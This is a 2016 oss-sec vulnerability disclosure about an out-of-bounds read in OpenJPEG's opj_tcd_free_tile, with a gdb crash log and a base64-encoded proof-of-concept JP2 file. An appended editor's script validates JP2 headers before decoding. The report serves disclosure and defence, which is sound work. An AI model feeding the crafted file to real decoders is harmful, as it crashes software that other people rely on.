oss-sec mailing list archives

CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function


From: winsonliu(刘科) <winsonliu () tencent com>
Date: Mon, 14 Mar 2016 06:51:56 +0000

Hi all,

I found a vulnerability in OpenJPEG. The specific flaw exists within the opj_tcd_free_tile function. A specially crafted
JPEG2000 image file can force an out-of-bounds read to occur in OpenJPEG. This issue can be reproduced in the latest
version of OpenJPEG (https://github.com/uclouvain/openjpeg 2016.03.14).

The detailed information about this issue is as follows.
---------------------------------
winson@ubuntu:~/Desktop/repo/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...(no debugging symbols found)...done.

(gdb) r -o image.pgm -i opj_tcd_free_tile.jp2 
Starting program: /home/winson/Desktop/repo/openjpeg/bin/opj_decompress -o image.pgm -i oob_opj_tcd_free_tile.jp2

[INFO] Start to read j2k main header (131).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[INFO] Header of tile 1 / 1 has been read.
[INFO] Tile 1/1 has been decoded.
[INFO] Image data has been updated with tile 1.

[INFO] Stream reached its end !
/home/winson/Desktop/repo/openjpeg/src/bin/jp2/convert.c:1765:imagetopnm
precision 31 is larger than 16
: refused.
[ERROR] Outfile image.pgm not generated

Program received signal SIGSEGV, Segmentation fault.
0xb7fc61ae in opj_tcd_free_tile () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7

(gdb) bt
#0  0xb7fc61ae in opj_tcd_free_tile () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#1  0xb7fc3ffa in opj_tcd_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#2  0xb7fa6cea in opj_j2k_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#3  0xb7fb4b38 in opj_jp2_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#4  0xb7fb74ac in opj_destroy_codec () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#5  0x0804ca82 in main ()

(gdb) x /i $eip
=> 0xb7fc61ae <opj_tcd_free_tile+288>: mov    0x20(%eax),%eax
(gdb) i r
eax            0x40f72d11 1089940753
ecx            0x30 48
edx            0x362e88c5 909019333
ebx            0xb7fd6000 -1208131584
esp            0xbfff9e80 0xbfff9e80
ebp            0xbfff9ec8 0xbfff9ec8
esi            0x0 0
edi            0x0 0
eip            0xb7fc61ae 0xb7fc61ae <opj_tcd_free_tile+288>
eflags         0x10293 [ CF AF SF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

(gdb) x /40xb $eax
0x40f72d11: Cannot access memory at address 0x40f72d11

(gdb) x /40xb $eax-0x20
0x40f72cf1: Cannot access memory at address 0x40f72cf1


The attachment is the proof-of-concept file.
Alternatively, you can decode the following string using base64 and save the decoded content to a .jp2 file.
---------------------------------
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA
BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABgAAAAiY2RlZgAEAAAAAAACAAEAAAADAAIA
AAADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAA
AAQECxWeAQEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy
ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch
8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO
HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA
9VfWofCMnawpQPlngP/Z


CREDIT:
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.

Attachment: oob_opj_tcd_free_tile.jp2
Description: oob_opj_tcd_free_tile.jp2
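Editor's added example, not part of the report above and not OpenJPEG's own code. The log in the report shows that opj_decompress only refuses the file's 31-bit component at the PNM-writing stage ("precision 31 is larger than 16"), i.e. after the full decode has already run, and the process then faults in opj_tcd_free_tile during teardown. One defensive measure that does not depend on knowing the root cause is to validate the container and codestream header before any decoder touches the data. The script below walks the JP2 box structure to the jp2c codestream, parses the SIZ marker segment, and rejects inputs that declare a component precision above a configured limit, a zero sub-sampling factor, a zero tile size or an empty image area. The precision limit of 16 and the test inputs are assumptions: the two samples are constructed in the script, the second one declaring Ssiz 0x9e (signed, precision 31) to mirror the value the report's log refuses.

```python
"""Pre-decode sanity check for JPEG 2000 (JP2 / J2K) inputs.

Example code added by the editor, not OpenJPEG's. Parses only the JP2 box
layer and the SIZ marker segment; nothing here decodes image data.
"""
import struct

# opj_decompress's PNM writer refuses precision above 16 (see the report's log),
# but only after decoding. This check applies the same limit to the raw header.
PRECISION_LIMIT = 16

JP2_SIGNATURE = b"\x00\x00\x00\x0cjP  \r\n\x87\n"


def iter_boxes(data, offset=0, end=None):
    """Yield (type, payload) for each JP2 box in data[offset:end], validating lengths."""
    end = len(data) if end is None else end
    while offset + 8 <= end:
        lbox, tbox = struct.unpack_from(">I4s", data, offset)
        header = 8
        if lbox == 1:                      # 64-bit XLBox length follows
            if offset + 16 > end:
                raise ValueError("truncated XLBox header")
            lbox = struct.unpack_from(">Q", data, offset + 8)[0]
            header = 16
        elif lbox == 0:                    # box extends to the end of the data
            lbox = end - offset
        if lbox < header or offset + lbox > end:
            raise ValueError("bad length %d for box %r at offset %d" % (lbox, tbox, offset))
        yield tbox, data[offset + header:offset + lbox]
        offset += lbox


def find_codestream(data):
    """Return the raw J2K codestream from a bare .j2k file or a JP2 'jp2c' box."""
    if data[:2] == b"\xff\x4f":            # SOC marker: bare codestream
        return data
    if data[:12] != JP2_SIGNATURE:
        raise ValueError("neither a JP2 signature box nor a raw codestream")
    for tbox, payload in iter_boxes(data):
        if tbox == b"jp2c":
            return payload
    raise ValueError("no jp2c box found")


def parse_siz(cs):
    """Parse the SIZ marker segment that must directly follow SOC."""
    if cs[:4] != b"\xff\x4f\xff\x51":
        raise ValueError("codestream does not begin with SOC followed by SIZ")
    fields = struct.unpack_from(">HHIIIIIIIIH", cs, 4)   # the 38 fixed SIZ bytes
    lsiz, _rsiz, xsiz, ysiz, xosiz, yosiz, xtsiz, ytsiz, xtosiz, ytosiz, csiz = fields
    if lsiz != 38 + 3 * csiz or len(cs) < 4 + lsiz:
        raise ValueError("Lsiz %d inconsistent with Csiz %d" % (lsiz, csiz))
    comps = []
    for i in range(csiz):                  # one (Ssiz, XRsiz, YRsiz) triple per component
        ssiz, xrsiz, yrsiz = struct.unpack_from(">BBB", cs, 42 + 3 * i)
        comps.append({"prec": (ssiz & 0x7F) + 1, "signed": bool(ssiz & 0x80),
                      "dx": xrsiz, "dy": yrsiz})
    return {"width": xsiz, "height": ysiz, "x0": xosiz, "y0": yosiz,
            "tile_w": xtsiz, "tile_h": ytsiz, "comps": comps}


def check_image(data, limit=PRECISION_LIMIT):
    """Return (ok, problems); problems lists each header field we would not hand to a decoder."""
    try:
        siz = parse_siz(find_codestream(data))
    except (ValueError, struct.error) as exc:
        return False, ["malformed container/header: %s" % exc]
    problems = []
    if siz["width"] <= siz["x0"] or siz["height"] <= siz["y0"]:
        problems.append("empty image area")
    if siz["tile_w"] == 0 or siz["tile_h"] == 0:
        problems.append("zero tile size")
    if not siz["comps"]:
        problems.append("no components")
    for i, c in enumerate(siz["comps"]):
        if c["prec"] > limit:
            problems.append("component %d: precision %d exceeds %d" % (i, c["prec"], limit))
        if c["dx"] == 0 or c["dy"] == 0:
            problems.append("component %d: zero sub-sampling factor" % i)
    return not problems, problems


def build_jp2(comps, width=32, height=32):
    """Constructed input: minimal JP2 wrapper around SOC+SIZ+EOC with the given component triples."""
    siz = struct.pack(">HHIIIIIIIIH", 38 + 3 * len(comps), 0, width, height, 0, 0,
                      width, height, 0, 0, len(comps))
    siz += b"".join(struct.pack(">BBB", *c) for c in comps)
    codestream = b"\xff\x4f\xff\x51" + siz + b"\xff\xd9"
    box = lambda t, p: struct.pack(">I4s", 8 + len(p), t) + p
    return JP2_SIGNATURE + box(b"ftyp", b"jp2 \x00\x00\x00\x00jp2 ") + box(b"jp2c", codestream)


# Constructed samples: four plain 8-bit components, and a set whose second
# component declares Ssiz 0x9e (signed, precision 31), the value the report's
# log refuses at PNM-output time.
SANE_COMPS = [(0x07, 1, 1)] * 4
ODD_COMPS = [(0x04, 1, 1), (0x9E, 1, 1), (0x04, 1, 1), (0x00, 1, 1)]

if __name__ == "__main__":
    for name, comps in (("sane", SANE_COMPS), ("odd", ODD_COMPS)):
        ok, problems = check_image(build_jp2(comps))
        print(name, "accept" if ok else "reject", problems)
```

Run against a file on disk with `check_image(open(path, "rb").read())`; a False result means the file is dropped before the decoder is invoked. The check is deliberately narrow: it accepts only what the header declares consistently, and it says nothing about whether a given file would trigger the free_tile fault, which the report does not attribute to any particular field.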